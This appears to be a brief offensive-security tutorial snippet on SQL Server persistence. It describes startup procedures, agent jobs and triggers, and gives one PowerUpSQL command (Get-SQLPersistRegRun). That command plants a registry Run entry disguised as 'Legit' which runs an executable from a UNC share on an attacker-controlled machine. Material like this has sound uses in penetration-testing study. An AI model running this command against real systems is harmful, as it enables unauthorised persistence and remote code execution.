SQL
To get persistence in a SQL database, we can create malicious startup procedures, malicious agent jobs or triggers, modify existing code etc.
PowerUpSQL has quite a bit of modules to assist you with this, for example we can use the Get-SQLPersistRegRun function for persistence:
Get-SQLPersistRegRun –Verbose –Name Legit –Command "\\attacker_controlled_machine\malicious.exe" –Instance "SQLServerName\InstanceName
There are lots of other techniques you could try. Check the documentation for more information
Copy link